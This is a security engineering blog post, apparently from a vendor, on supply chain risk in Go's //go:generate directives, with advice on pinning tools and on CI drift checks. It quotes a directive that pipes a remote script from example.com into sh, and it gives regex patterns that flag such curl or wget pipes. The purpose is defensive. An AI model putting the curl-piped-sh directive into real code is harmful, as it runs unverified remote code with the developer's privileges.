DevSecOps

go generate Supply Chain Risks

go generate is a seam where arbitrary commands run with the full privileges of the developer, and it does not show up in any manifest of trusted dependencies.

Nayan Dey
Senior Security Engineer
7 min read

There is a seam in most Go projects that no dependency scanner watches, no checksum database verifies, and no go.mod declares. It is go generate. Anyone who has worked on a Go codebase of any size has run into //go:generate directives that invoke protoc, stringer, mockgen, sqlc, oapi-codegen, or some home-grown script. They work. They are convenient. They are also, from a supply chain perspective, a small blind spot that can grow into a big one.

I want to unpack what go generate actually does, where the trust boundaries are, and how teams can keep it from becoming an arbitrary code execution vector.

What does go generate do?

The command is simple. go generate ./... scans Go source files for comments of the form //go:generate <command> and executes each command in the directory of the file containing the directive. There is no sandbox. The command runs with the same privileges as the user running go generate. It can write files, make network requests, spawn subprocesses, or do anything else a shell command can do.

The directives look like this:

//go:generate stringer -type=State
//go:generate protoc --go_out=. types.proto
//go:generate sh -c "curl https://example.com/gen.sh | sh"

That third form is not hypothetical. I have seen it in real repositories. It executes a remote script every time go generate runs. The script's content is not pinned, not checksummed, and not reviewed.

Why is this a supply chain concern?

The Go module system gives you strong integrity guarantees for code that is imported and compiled. The checksum database, go.sum, and proxy verification all cover code pulled in through import statements. None of it covers tools invoked by go generate. A //go:generate directive can reach out to any URL, invoke any binary on the developer's PATH, and write arbitrary files to the repository.

The typical flow is benign. A developer runs go generate locally before committing, and the generated files are reviewed as part of the PR. But the flow breaks down when go generate is run in CI, or when a developer trusts that the directive will do what the comment says without actually reading the command.

In March 2024, researchers documented a pattern where attackers targeted //go:generate directives that invoked tools downloaded via go install. If the tool's module was compromised, go generate would pull the latest version, which might contain malicious code, and run it with full privileges. go install does consult the checksum database, but @latest resolves to whatever the newest published version is, so a freshly published malicious release verifies cleanly; only an explicitly pinned version protects against this.

Pinning generation tools

The first mitigation is to pin the tools that go generate invokes. There is a well-known pattern for this: a tools.go file with a build tag that imports the tools as dependencies, forcing them to appear in go.mod and go.sum.

//go:build tools

package tools

import (
    _ "golang.org/x/tools/cmd/stringer"
    _ "google.golang.org/protobuf/cmd/protoc-gen-go"
)

With this pattern, the tools are pinned to specific versions in go.mod, and go mod verify catches tampering. You then install them from inside the module with go install golang.org/x/tools/cmd/stringer, which resolves the version from go.mod, rather than go install golang.org/x/tools/cmd/stringer@latest, which ignores the module's go.mod entirely.
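A related pattern avoids the separate install step entirely: invoke the tool through go run with its full package path, so the version that executes is always the one recorded in go.mod. The directive would look like this:

```go
//go:generate go run golang.org/x/tools/cmd/stringer -type=State
```

The trade-off is that the tool is compiled on first use, a cost the build cache amortizes, in exchange for never depending on what happens to be installed on the developer's PATH.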

Go 1.24, due in February 2025, introduces a tool directive as a first-class way to declare tools in go.mod, which will replace the tools.go trick. Until then, tools.go is the accepted convention.
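Under the new directive, adding a tool is a one-liner, go get -tool golang.org/x/tools/cmd/stringer, after which go.mod gains an entry along these lines (module path and versions illustrative):

```
module example.com/m

go 1.24

tool golang.org/x/tools/cmd/stringer

require golang.org/x/tools v0.29.0
```

The tool is then invoked as go tool stringer, version-locked and checksum-verified like any other dependency.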

What about non-Go tools?

protoc, gRPC plugins, buf, sqlc in some configurations, and many others are not Go modules. They are binaries distributed as tarballs or through package managers, and pinning them is harder.

For protoc, I recommend buf, which pins plugin versions explicitly in its configuration. For other binaries, pin a SHA256 checksum in the repository and validate it on install. Tools like bingo and hermit can help manage binary dependencies with checksums.
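The checksum-pinning idea is small enough to sketch directly. In the snippet below a throwaway file stands in for the downloaded binary; in a real repo the pinned hash would live in a committed, reviewed file (say, a hypothetical tools/protoc.sha256):

```shell
set -eu

# verify_tool FILE EXPECTED_SHA256: refuse to use a binary whose
# checksum does not match the hash pinned in the repository.
verify_tool() {
  actual="$(sha256sum "$1" | awk '{print $1}')"
  if [ "$actual" != "$2" ]; then
    echo "checksum mismatch for $1: got $actual, want $2" >&2
    return 1
  fi
}

# Demonstration: a throwaway file standing in for a downloaded protoc.
demo=/tmp/protoc-demo
printf 'fake-protoc-binary' > "$demo"
pinned="$(sha256sum "$demo" | awk '{print $1}')"

verify_tool "$demo" "$pinned" && echo "checksum ok"
verify_tool "$demo" "0000000000000000" || echo "tampering detected"
```

A real install script would run verify_tool immediately after the download and before the binary is placed on PATH.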

A //go:generate directive that invokes protoc without a pinned version is a supply chain concern. The version on the developer's laptop might not match the version on the CI runner, and neither is verified.

Running go generate in CI

A common pattern is to run go generate ./... in CI and then check that the generated files match what was committed. The intent is to catch drift between committed generated code and what the generators would produce.

This is useful but has a catch. If the generators are not pinned, the CI run may produce different output than the developer's local run, and the drift check fails not because the developer did anything wrong but because the CI runner has a different version of the generator. Worse, if the generator is compromised between the developer's run and the CI run, the failure looks like routine version skew, and the common response, regenerating and committing the new output, merges the malicious code without review.

The mitigation is to run go generate only in a controlled environment where the tool versions are guaranteed, and treat the generated files as source of truth. The tools.go pattern plus go install with pinned versions makes this work.
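The drift gate itself is a few lines of shell. The sketch below simulates the flow in a throwaway git repo, with an echo standing in for the real go generate ./... step, so the mechanics are visible without installing any generators:

```shell
set -eu

# Set up a throwaway repo with a committed "generated" file.
repo="$(mktemp -d)"
cd "$repo"
git init -q
echo "package gen // generated" > gen.go
git add gen.go
git -c user.email=ci@example.com -c user.name=ci commit -q -m "add generated file"

# In CI this step would be: go generate ./...
# Simulate a regeneration that produces different output.
echo "package gen // regenerated with a newer tool" > gen.go

# The gate: fail the build if regeneration changed anything.
if git diff --exit-code --quiet; then
  echo "generated files are up to date"
else
  echo "generated files drifted; regenerate with pinned tools and commit" >&2
fi
```

A real pipeline would exit 1 in the else branch; here the message stands in so the sketch runs to completion.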

Shell redirections and curl-piped installs

Any //go:generate that pipes curl into sh is a red flag. It executes remote content without verification. I maintain a simple regex check in a pre-commit hook that flags such directives:

//go:generate.*curl.*\|.*sh
//go:generate.*wget.*\|.*bash
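Wired into a hook, the check is a single grep over the staged Go files. The sketch below runs the combined pattern against a sample file (the path is hypothetical):

```shell
set -eu

# A sample file containing the kind of directive the hook should catch.
sample=/tmp/gen_demo.go
cat > "$sample" <<'EOF'
package demo

//go:generate sh -c "curl https://example.com/gen.sh | sh"
EOF

# Flag //go:generate directives that pipe remote content into a shell.
# A real pre-commit hook would run this over staged files and exit 1 on a match.
if grep -nE '//go:generate.*(curl|wget).*\|.*(sh|bash)' "$sample"; then
  echo "blocked: remote script piped to shell" >&2
fi
```

The -n flag reports the line number, which makes the finding easy to locate in a large file.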

Teams push back because sometimes such directives are the most convenient way to install a one-off tool. My reply is that convenience is not a security principle. If a tool is worth depending on, it is worth pinning.

The generated code review problem

Generated code is often voluminous and visually noisy. Reviewers skip it. This is a well-known pattern across ecosystems. In Go, generated protobuf files for a medium-sized schema can run thousands of lines.

If an attacker can modify the generator or its inputs, they can inject code that is unlikely to be reviewed. The defense is to have two independent sources of truth: the committed generated code and the ability to regenerate it in CI and compare. If the regenerated output differs from the committed output, the build fails. This makes it impossible to smuggle hand-edited code into a generated file without detection.

Known incidents and patterns

In 2023, there were reports of install-time code execution during go install in the ken-matsui/gh-s GitHub CLI extension ecosystem. While not strictly a go generate case, it illustrated the same risk: tools installed with @latest can pull changing code.

CVE-2023-24531 affected go env handling of GOCACHE and GOTMPDIR, which indirectly affected go generate invocations that relied on those paths. Go 1.20.5 and 1.19.10 fixed it in June 2023.

What about code generation as a build step?

I prefer to commit generated files to the repository and treat go generate as a developer-invoked command, not a build step. The reviewed artifact is the code that will run in production. CI regenerates and diffs, rather than generating from scratch.

The alternative, regenerating during every build, requires a full toolchain on every build runner, complicates caching, and obscures whether a change came from a source edit or a generator update. For some projects (protoc with very large schemas) the generated output is excluded from the repo and regenerated. That is fine as long as the tools are pinned and CI verification is strict.

How Safeguard Helps

Safeguard scans every repository for //go:generate directives and builds an inventory of the tools they invoke, their pinned versions, and whether they are declared in a tools.go file or the upcoming tool directive. When a directive references an unpinned binary, a remote script, or a tool with a known vulnerability, Safeguard raises a finding. Policy gates can block merges that introduce curl-piped-sh patterns or that downgrade a pinned tool version, and the generated-code drift check is surfaced alongside dependency findings in a unified view.
